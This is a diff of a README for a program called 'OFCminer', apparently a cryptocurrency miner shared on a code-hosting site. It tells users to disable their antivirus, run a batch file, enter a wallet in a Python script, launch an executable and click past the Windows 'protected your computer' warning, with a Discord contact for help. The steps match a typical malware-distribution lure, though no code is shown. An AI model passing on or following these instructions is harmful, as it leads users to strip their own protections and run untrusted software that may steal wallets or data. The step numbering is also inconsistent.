BroImAgoodGuy/OFCminer/README.md

 Before download:

+a .download WinRAR
-disable your antivirus
+b .disable your antivirus

 After download:
+c .
+Extract the file

-click on PythonInstaller.bat
+1 .click on PythonInstaller.bat
-click on walletsetup.py and enter your wallet click on OFCminer.exe
+2 .click on walletsetup.py and enter your wallet
+3 .click on OFCminer.exe
-If it says "Windows protected your computer" Just click on "complementary information" and then click on "ignore (if it is not launching add DiscodoBaguette#8369 on Discord) then if it lauch select your parameter !
+4 .If it says "Windows protected your computer" Just click on "complementary information" and then click on "ignore (if it is not launching add DiscodoBaguette#8369 on Discord) 6 .then if it lauch select your parameter !
 (click on bal.py to see your balance)